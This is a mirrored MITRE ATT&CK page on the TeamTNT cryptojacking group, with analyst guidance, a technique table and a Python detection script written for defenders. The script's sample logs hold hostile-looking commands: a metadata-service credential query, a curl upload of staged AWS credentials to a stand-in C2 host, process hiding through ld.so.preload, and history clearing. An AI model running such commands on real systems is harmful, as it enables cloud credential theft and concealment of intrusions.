MITRE ATT&CK® Group

G0139: TeamTNT

TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group has been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.[1][2][3][4][5][6][7][8][9]

Domain: Enterprise. ID: G0139. Type: Group. Object version: 1.4.
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

TeamTNT matters because ATT&CK describes it as a cloud- and container-focused group that has used victim cloud/container resources for cryptocurrency mining. For leaders, the practical issue is not only miner cleanup; it is whether exposed container services, weak cloud identities, or insufficient workload telemetry would let an intrusion consume resources, steal credentials, move through cloud workloads, and leave limited evidence.

Executive priority

Prioritize this as a cloud and container resilience validation. Ask whether Kubernetes, container runtime, SSH, Linux workload, and cloud API activity are logged well enough to prove what happened; whether service account and cloud credentials can be rapidly revoked or rotated; and whether misconfigured kubelets, exposed container APIs, and over-privileged identities are continuously found and remediated. This behavior is relevant to operational cost control, workload availability, incident response readiness, and compliance evidence for cloud control effectiveness.

Technical view

MITRE provides no official detection text for TeamTNT, so defenders should build coverage from the related software and techniques. The relationship set points to Linux, Containers, and IaaS-heavy activity, including Hildegard targeting misconfigured kubelets, Peirates gathering Kubernetes service account tokens, Linux credential dumping with MimiPenguin, password recovery with LaZagne, shell and cloud/container API execution, SSH lateral movement, discovery, masquerading, obfuscation, file deletion, command history clearing, application-layer C2, and possible exfiltration over alternate protocols. SOC and IR teams should validate end-to-end visibility across host, container, Kubernetes, cloud control plane, identity, and network layers rather than relying only on endpoint alerts.

Likely telemetry

  • Cloud control plane/API audit logs and identity activity logs
  • Kubernetes audit logs, kubelet access logs, and service account token usage evidence
  • Container runtime and Docker/container API activity logs
  • Linux process execution, shell command, cron/service, and file activity telemetry
  • SSH authentication and session activity

Detection direction

  • Confirm whether ephemeral containers and short-lived cloud workloads are logged before termination; this is a common blind spot for cloud/container intrusions.
  • Correlate container or cloud API execution with discovery commands, service/account token access, SSH activity, and unusual egress rather than alerting on any single command alone.
  • Tune for administrative false positives: cloud automation, vulnerability scanners, DevOps scripts, and legitimate Kubernetes administration can resemble discovery or API execution.
  • Look for sequences involving misconfigured container/Kubernetes access, shell execution, credential or token collection, lateral movement via SSH, and resource-intensive miner behavior.
  • Add evasion-aware hunting for masqueraded file names/locations, encoded or packed artifacts, rootkit-like hiding, deleted tools, and cleared command history.
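One way to implement the sequence-based correlation described above, as an added example that is not part of the original page or of ATT&CK. It runs over constructed process-execution lines; the stage regexes, the 30-minute window and the three-stage threshold are assumptions to be tuned against local telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviour stages taken from the procedures listed on this page. The regexes
# are illustrative assumptions, not a complete or vendor-validated signature set.
STAGES = {
    "container_discovery": re.compile(r"\bdocker (ps|inspect)\b|\bmasscan\b.*(2375|10250)|\bkubectl get pods\b"),
    "credential_access": re.compile(r"169\.254\.169\.254|/proc/[0-9*]+/environ|\.ssh/id_|\.aws/credentials"),
    "rival_discovery": re.compile(r"\bnetstat -anp\b|\bps (aux|-ef)\b.*(aliyun|liyun)"),
    "defense_evasion": re.compile(r"\bhistory -c\b|/etc/ld\.so\.preload|\bchattr\b|\biptables -F\b|/var/log/syslog"),
    "persistence": re.compile(r"\bsystemctl (enable|daemon-reload)\b|authorized_keys"),
    "exfiltration": re.compile(r"\bcurl\b.*(-F|--data|-d|-T) .*https?://|iplogger\.org"),
}
WINDOW = timedelta(minutes=30)   # assumed correlation window; tune per environment
MIN_STAGES = 3                   # assumed threshold: a single matching command never alerts

# Constructed sample telemetry: "<ISO-8601 timestamp> <host> <user> <command line>".
# node-a shows a TeamTNT-like sequence; node-b is routine DevOps activity.
SAMPLE_LOG = """\
2024-05-01T10:00:00 node-a root masscan 10.0.0.0/16 -p2375,10250 --rate 10000
2024-05-01T10:02:10 node-a root docker ps -a
2024-05-01T10:03:30 node-a root curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
2024-05-01T10:04:00 node-a root netstat -anp
2024-05-01T10:05:00 node-a root curl -F f=@/tmp/.aws.txt http://c2.example.invalid/up
2024-05-01T10:05:45 node-a root echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
2024-05-01T10:06:00 node-a root history -c
2024-05-01T09:00:00 node-b deploy docker ps
2024-05-01T09:30:00 node-b deploy docker inspect web-frontend
2024-05-01T15:00:00 node-b deploy systemctl enable nginx
""".splitlines()

def parse_line(line):
    ts, host, user, cmd = line.split(" ", 3)
    return datetime.fromisoformat(ts), host, user, cmd

def classify(cmd):
    """Return the set of stage names a single command line matches (often empty)."""
    return {name for name, rx in STAGES.items() if rx.search(cmd)}

def correlate(lines, window=WINDOW, min_stages=MIN_STAGES):
    """Map host -> sorted stage names for hosts with >= min_stages distinct stages
    inside one sliding window. Isolated docker/systemctl commands from
    administrators stay below the threshold and are not reported."""
    per_host = defaultdict(list)
    for line in lines:
        ts, host, _user, cmd = parse_line(line)
        per_host[host].extend((ts, stage) for stage in classify(cmd))
    alerts = {}
    for host, events in per_host.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {stage for ts, stage in events[i:] if ts - start <= window}
            if len(seen) >= min_stages:
                alerts[host] = sorted(seen)
                break
    return alerts

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_LOG).items():
        print(f"{host}: {len(stages)} stages within {WINDOW}: {', '.join(stages)}")
```

In the constructed sample only node-a is reported, with five stages inside six minutes, while node-b's routine `docker ps`, `docker inspect` and `systemctl enable` never reach the threshold.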

Mitigation priorities

  • Reduce exposed or misconfigured container and Kubernetes control surfaces, especially kubelet and container APIs.
  • Apply least privilege to cloud identities, Kubernetes service accounts, and workload credentials; prepare rapid credential rotation and token revocation procedures.
  • Harden SSH access paths and monitor remote shell usage on Linux, macOS, ESXi, and relevant cloud workloads where present.
  • Preserve cloud, container, host, and network logs centrally so attackers cannot remove local evidence by clearing history or deleting files.
  • Control unnecessary shell, cloud CLI, and container CLI/API access on production workloads while maintaining approved administrative paths.

Analyst notes and limits

This take is derived from the official TeamTNT ATT&CK group description, its external references, and the supplied "uses" relationships. The group object itself lists platforms and tactics as not specified, but the related techniques and software include Linux, Containers, IaaS, SSH, cloud APIs, container APIs, discovery, execution, lateral movement, stealth, command-and-control, and exfiltration context. Treat the related behaviors as defensive planning inputs, not proof that every TeamTNT-referenced incident will contain every behavior.

ATT&CK does not provide official detection guidance for this group, and the group-level platforms/tactics are not specified. Local architecture, cloud provider, Kubernetes/container runtime design, logging retention, and identity model are required to turn this into precise detections or control tests. No claim is made here about current activity, customer exposure, or guaranteed detection coverage.

Official MITRE ATT&CK definition

TeamTNT

TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group has been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.[1][2][3][4][5][6][7][8][9]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

56 rows. Columns: Domain, ID, Name, Relationship / procedure.
Enterprise T1680 Local Storage Discovery

TeamTNT has searched for disk partition and logical volume information.[7] (Citation: Cisco Talos Intelligence Group)

Enterprise T1686 Disable or Modify System Firewall

TeamTNT has disabled iptables.[8]

Enterprise T1133 External Remote Services

TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments.[3] (Citation: Cisco Talos Intelligence Group) TeamTNT has also targeted exposed kubelets in Kubernetes environments.[5]

Enterprise T1219 Remote Access Tools

TeamTNT has established tmate sessions for C2 communications.[5] (Citation: Cisco Talos Intelligence Group)

Enterprise T1569.003 Systemctl Sub-technique

TeamTNT has created system services to execute cryptocurrency mining software. (Citation: Cisco Talos Intelligence Group)

Enterprise T1036.005 Match Legitimate Resource Name or Location Sub-technique

TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software. (Citation: Cisco Talos Intelligence Group)

Enterprise T1222.002 Linux and Mac Permissions Sub-technique

TeamTNT has modified the permissions on binaries with chattr.[6] (Citation: Cisco Talos Intelligence Group)

Enterprise T1070.004 File Deletion Sub-technique

TeamTNT has used a payload that removes itself after running. TeamTNT has also deleted locally staged files containing collected credentials or scan results for local IP addresses after exfiltrating them.[7] (Citation: Cisco Talos Intelligence Group)

Enterprise T1609 Container Administration Command

TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers.[5]

Enterprise T1059.004 Unix Shell Sub-technique

TeamTNT has used shell scripts for execution.[6] (Citation: Cisco Talos Intelligence Group)

Enterprise T1547.001 Registry Run Keys / Startup Folder Sub-technique

TeamTNT has added batch scripts to the startup folder.[7]

Enterprise T1543.002 Systemd Service Sub-technique

TeamTNT has established persistence through the creation of a cryptocurrency mining system service using systemctl.[6] (Citation: Cisco Talos Intelligence Group)

Enterprise T1136.001 Local Account Sub-technique

TeamTNT has created local privileged users on victim machines.[3]

Enterprise T1007 System Service Discovery

TeamTNT has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them. (Citation: Cisco Talos Intelligence Group)

Enterprise T1049 System Network Connections Discovery

TeamTNT has run netstat -anp to search for rival malware connections.[6] TeamTNT has also used `libprocesshider` to modify /etc/ld.so.preload.[7]

Enterprise T1543.003 Windows Service Sub-technique

TeamTNT has used malware that adds cryptocurrency miners as a service.[7]

Enterprise T1608.001 Upload Malware Sub-technique

TeamTNT has uploaded backdoored Docker images to Docker Hub.[2]

Enterprise T1059.003 Windows Command Shell Sub-technique

TeamTNT has used batch scripts to download tools and execute cryptocurrency miners.[7]

Enterprise T1610 Deploy Container

TeamTNT has deployed different types of containers into victim environments to facilitate execution.[3][6] TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges. (Citation: Cisco Talos Intelligence Group)

Enterprise T1613 Container and Resource Discovery

TeamTNT has checked for running containers with docker ps and for specific container names with docker inspect.[6] TeamTNT has also searched for Kubernetes pods running in a local network. (Citation: Cisco Talos Intelligence Group)

Enterprise T1048 Exfiltration Over Alternative Protocol

TeamTNT has sent locally staged files with collected credentials to C2 servers using cURL. (Citation: Cisco Talos Intelligence Group)

Enterprise T1057 Process Discovery

TeamTNT has searched for rival malware and removed it if found.[6] TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools. (Citation: Cisco Talos Intelligence Group)

Enterprise T1059.001 PowerShell Sub-technique

TeamTNT has executed PowerShell commands in batch scripts.[7]

Enterprise T1552.005 Cloud Instance Metadata API Sub-technique

TeamTNT has queried the AWS instance metadata service for credentials.[6] (Citation: Cisco Talos Intelligence Group)

Enterprise T1070.003 Clear Command History Sub-technique

TeamTNT has cleared command history with history -c.[6] (Citation: Cisco Talos Intelligence Group)

Enterprise T1074.001 Local Data Staging Sub-technique

TeamTNT has aggregated collected credentials in text files before exfiltrating them. (Citation: Cisco Talos Intelligence Group)

Enterprise T1595.002 Vulnerability Scanning Sub-technique

TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.[6]

Enterprise T1059.013 Container CLI/API Sub-technique

TeamTNT has targeted misconfigured containers and used container CLI tools. (Citation: Cisco Talos Blog)

Enterprise T1027.002 Software Packing Sub-technique

TeamTNT has used UPX and Ezuri packer to pack its binaries.[6]

Enterprise T1204.003 Malicious Image Sub-technique

TeamTNT has relied on users to download and execute malicious Docker images.[2]

Enterprise T1014 Rootkit

TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.[6] (Citation: Cisco Talos Intelligence Group)

Enterprise T1552.004 Private Keys Sub-technique

TeamTNT has searched for unsecured SSH keys.[4][6]

Enterprise T1611 Escape to Host

TeamTNT has deployed privileged containers that mount the filesystem of the victim machine.[3][8]

Enterprise T1595.001 Scanning IP Blocks Sub-technique

TeamTNT has scanned specific lists of target IP addresses.[6]

Enterprise T1105 Ingress Tool Transfer

TeamTNT has used the curl and wget commands as well as batch scripts to download new tools.[3] (Citation: Cisco Talos Intelligence Group)

Enterprise T1518.001 Security Software Discovery Sub-technique

TeamTNT has searched for security products on infected machines.[7] (Citation: Cisco Talos Intelligence Group)

Enterprise T1496.001 Compute Hijacking Sub-technique

TeamTNT has deployed XMRig Docker images to mine cryptocurrency.[2][4] TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency. (Citation: Cisco Talos Intelligence Group)

Enterprise T1083 File and Directory Discovery

TeamTNT has used a script that checks `/proc/*/environ` for environment variables related to AWS. (Citation: Cisco Talos Intelligence Group)

Enterprise T1021.004 SSH Sub-technique

TeamTNT has used SSH to connect back to victim machines.[3] TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them. (Citation: Cisco Talos Intelligence Group)

Enterprise T1036 Masquerading

TeamTNT has disguised their scripts with docker-related file names. (Citation: Cisco Talos Intelligence Group)

Enterprise T1140 Deobfuscate/Decode Files or Information

TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope. (Citation: Cisco Talos Intelligence Group)

Enterprise T1082 System Information Discovery

TeamTNT has searched for system version, architecture, and hostname information.[7] (Citation: Cisco Talos Intelligence Group)

Enterprise T1027.013 Encrypted/Encoded File Sub-technique

TeamTNT has encrypted its binaries via AES and encoded files using Base64.[6][8]

Enterprise T1016 System Network Configuration Discovery

TeamTNT has enumerated the host machine’s IP address.[6]

Enterprise T1046 Network Service Discovery

TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters.[4][5] (Citation: Cisco Talos Intelligence Group) TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.[1]

Enterprise T1120 Peripheral Device Discovery

TeamTNT has searched for attached VGA devices using lspci. (Citation: Cisco Talos Intelligence Group)

Enterprise T1685 Disable or Modify Tools

TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.[7] (Citation: Cisco Talos Intelligence Group)

Enterprise T1071 Application Layer Protocol

TeamTNT has used an IRC bot for C2 communications.[6]

Enterprise T1098.004 SSH Authorized Keys Sub-technique

TeamTNT has added RSA keys to authorized_keys.[8] (Citation: Cisco Talos Intelligence Group)

Enterprise T1583.001 Domains Sub-technique

TeamTNT has obtained domains to host their payloads.[1]

Enterprise T1059.009 Cloud API Sub-technique

TeamTNT has leveraged the AWS CLI to enumerate cloud environments with compromised credentials. (Citation: Talos TeamTNT)

Enterprise T1071.001 Web Protocols Sub-technique

TeamTNT has used the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software.[3][4] (Citation: Cisco Talos Intelligence Group) TeamTNT has also used a custom User-Agent HTTP header in shell scripts.[6]

Enterprise T1552.001 Credentials In Files Sub-technique

TeamTNT has searched for unsecured AWS credentials and Docker API credentials.[4][6] (Citation: Cisco Talos Intelligence Group)

Enterprise T1685.006 Clear Linux or Mac System Logs Sub-technique

TeamTNT has removed system logs from /var/log/syslog.[8]

Enterprise T1587.001 Malware Sub-technique

TeamTNT has developed custom malware such as Hildegard.[5]

Enterprise T1102 Web Service

TeamTNT has leveraged iplogger.org to send collected data back to C2.[8] (Citation: Cisco Talos Intelligence Group)

Associated objects

Groups, software, and campaigns

Tool (Enterprise)

S0683: Peirates

Peirates is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.[1]

Platforms: Containers

Tool (Enterprise)

S0349: LaZagne

LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.[1]

Platforms: Linux, macOS, Windows

Malware (Enterprise)

S0601: Hildegard

Hildegard is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind Hildegard.[1]

Platforms: Linux, Containers, IaaS
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.

ATT&CK release: 19.1
Object version: 1.4
Raw hash: 352e6bff7c7e2452...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 1.4 | | Current bundle | 352e6bff7c7e…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  [1] Palo Alto Black-T October 2020. Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.
  [2] Lacework TeamTNT May 2021. Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 16, 2024.
  [3] Intezer TeamTNT September 2020. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
  [4] Cado Security TeamTNT Worm August 2020. Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.
  [5] Unit 42 Hildegard Malware. Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
  [6] Trend Micro TeamTNT. Fiser, D. and Oliveira, A. (n.d.). Tracking the Activities of TeamTNT: A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.
  [7] ATT TeamTNT Chimaera September 2020. AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.
  [8] Aqua TeamTNT August 2020. Kol, R. and Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.
  [9] Intezer TeamTNT Explosion September 2021. Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.
  [10] mitre-attack G0139.
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.